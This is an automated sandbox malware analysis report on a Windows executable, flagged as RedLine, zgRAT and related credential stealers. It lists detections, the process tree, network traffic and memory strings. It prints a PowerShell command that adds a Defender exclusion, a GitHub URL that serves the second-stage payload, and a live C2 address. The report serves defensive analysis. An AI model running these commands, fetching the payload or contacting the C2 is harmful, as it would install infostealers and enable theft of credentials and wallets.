Windows Analysis Report
9LrEuTWP8s.exe

Overview

General Information

Sample name: 9LrEuTWP8s.exe
renamed because original name is a hash value
Original sample name: 602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1.exe
Analysis ID: 1554430
MD5: ba7d3bda1009e3900c1eca3d56aa8b4f
SHA1: 3393a8485928315b58def904ccfb342ae1b30bdf
SHA256: 602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1
Tags: 4-251-123-83, exe, user-JAMESWT_MHT

Detection

Meduza Stealer, PureLog Stealer, RedLine, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Meduza Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 9LrEuTWP8s.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\9LrEuTWP8s.exe" MD5: BA7D3BDA1009E3900C1ECA3D56AA8B4F)
    • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7740 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7924 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • uh3ex1.exe (PID: 8092 cmdline: "C:\Path1\To2\Save444\uh3ex1.exe" MD5: 50CA49634420336958CE73629D9A2CF6)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "4.251.123.83:6677"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  • 0x45c19:$s1: file:///
  • 0x45b51:$s2: {11111-22222-10009-11112}
  • 0x45ba9:$s3: {11111-22222-50001-00000}
  • 0x423fa:$s4: get_Module
  • 0x42864:$s5: Reverse
  • 0x45226:$s6: BlockCopy
  • 0x42c23:$s7: ReadByte
  • 0x45c2b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
6.2.uh3ex1.exe.6d5ab000.4.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
6.2.uh3ex1.exe.6d5ab000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
6.2.uh3ex1.exe.6d5ab000.4.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
6.2.uh3ex1.exe.6d5ab000.4.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen
  • 0x45c19:$s1: file:///
  • 0x45b51:$s2: {11111-22222-10009-11112}
  • 0x45ba9:$s3: {11111-22222-50001-00000}
  • 0x423fa:$s4: get_Module
  • 0x42864:$s5: Reverse
  • 0x45226:$s6: BlockCopy
  • 0x42c23:$s7: ReadByte
  • 0x45c2b:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
8.2.MSBuild.exe.f00000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security

                      System Summary

                      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9LrEuTWP8s.exe", ParentImage: C:\Users\user\Desktop\9LrEuTWP8s.exe, ParentProcessId: 7620, ParentProcessName: 9LrEuTWP8s.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', ProcessId: 7740, ProcessName: powershell.exe
                      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9LrEuTWP8s.exe", ParentImage: C:\Users\user\Desktop\9LrEuTWP8s.exe, ParentProcessId: 7620, ParentProcessName: 9LrEuTWP8s.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444', ProcessId: 7740, ProcessName: powershell.exe
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-11-12T14:50:35.772200+0100 | 2046056 | 1 | A Network Trojan was detected | 4.251.123.83 | 6677 | 192.168.2.9 | 49709 | TCP
                      2024-11-12T14:50:35.062136+0100 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.9 | 49709 | 4.251.123.83 | 6677 | TCP


                      AV Detection

                      Source: C:\Path1\To2\Save444\uh3ex1.exe; Avira: detection malicious, Label: HEUR/AGEN.1311038
                      Source: MSBuild.exe.8184.8.memstrmin; Malware Configuration Extractor: RedLine {"C2 url": "4.251.123.83:6677"}
                      Source: C:\Path1\To2\Save444\uh3ex1.exe; ReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\gdi32.dll; ReversingLabs: Detection: 83%
                      Source: 9LrEuTWP8s.exe; ReversingLabs: Detection: 47%
                      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Roaming\gdi32.dll; Joe Sandbox ML: detected
                      Source: C:\Path1\To2\Save444\uh3ex1.exe; Joe Sandbox ML: detected
                      Source: 9LrEuTWP8s.exe; Joe Sandbox ML: detected
                      Source: unknown; HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49707 version: TLS 1.2
                      Source: unknown; HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:49708 version: TLS 1.2
                      Source: 9LrEuTWP8s.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Bootcherito\source\repos\ConsoleApp2\ConsoleApp2\obj\Release\ConsoleApp2.pdb source: 9LrEuTWP8s.exe
                      Source: C:\Path1\To2\Save444\uh3ex1.exe; Code function: 6_2_6D59C108 FindFirstFileExW, 6_2_6D59C108

                      Networking

                      Source: Network traffic; Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.9:49709 -> 4.251.123.83:6677
                      Source: Network traffic; Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 4.251.123.83:6677 -> 192.168.2.9:49709
                      Source: Malware configuration extractor; URLs: 4.251.123.83:6677
                      Source: global traffic; TCP traffic: 192.168.2.9:49709 -> 4.251.123.83:6677
                      Source: global traffic; TCP traffic: 192.168.2.9:64932 -> 1.1.1.1:53
                      Source: global traffic; HTTP traffic detected: GET /Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
                      Source: global traffic; HTTP traffic detected: GET /github-production-release-asset-2e65be/882783246/b23a0dba-ce39-4346-b67f-261d78699733?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241112%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241112T135026Z&X-Amz-Expires=300&X-Amz-Signature=2c2918ad1c088c74e424c5e0842a55433a7fe7a314dfeedb12184bfb225b99f5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Duh3ex1.exe&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
                      Source: Joe Sandbox View; IP Address: 140.82.121.4
                      Source: Joe Sandbox View; IP Address: 185.199.111.133
                      Source: Joe Sandbox View; IP Address: 4.251.123.83
                      Source: Joe Sandbox View; ASN Name: LEVEL3US
                      Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.45
                      Source: MSBuild.exe, 00000008.00000002.1669008971.0000000006381000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: \??\C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.000000000337A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: qpC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.000000000337A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: qpC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb(;0 equals www.youtube.com (Youtube)
                      Source: global traffic; DNS traffic detected: DNS query: github.com
                      Source: global traffic; DNS traffic detected: DNS query: objects.githubusercontent.com
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.0000000003331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field1ResponseD
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002EF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field2ResponseD
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3Response
                      Source: MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/example/Field3ResponseD
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: MSBuild.exe, 00000008.00000002.1650116521.00000000030B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                      Source: powershell.exe, 00000003.00000002.1473468111.0000000004751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000339B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                      Source: powershell.exe, 00000003.00000002.1473468111.00000000048A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 9LrEuTWP8s.exeString found in binary or memory: https://github.com/Xavieprowel/crispy-palm-tree/releases/download/1/uh3ex1.exe
                      Source: powershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
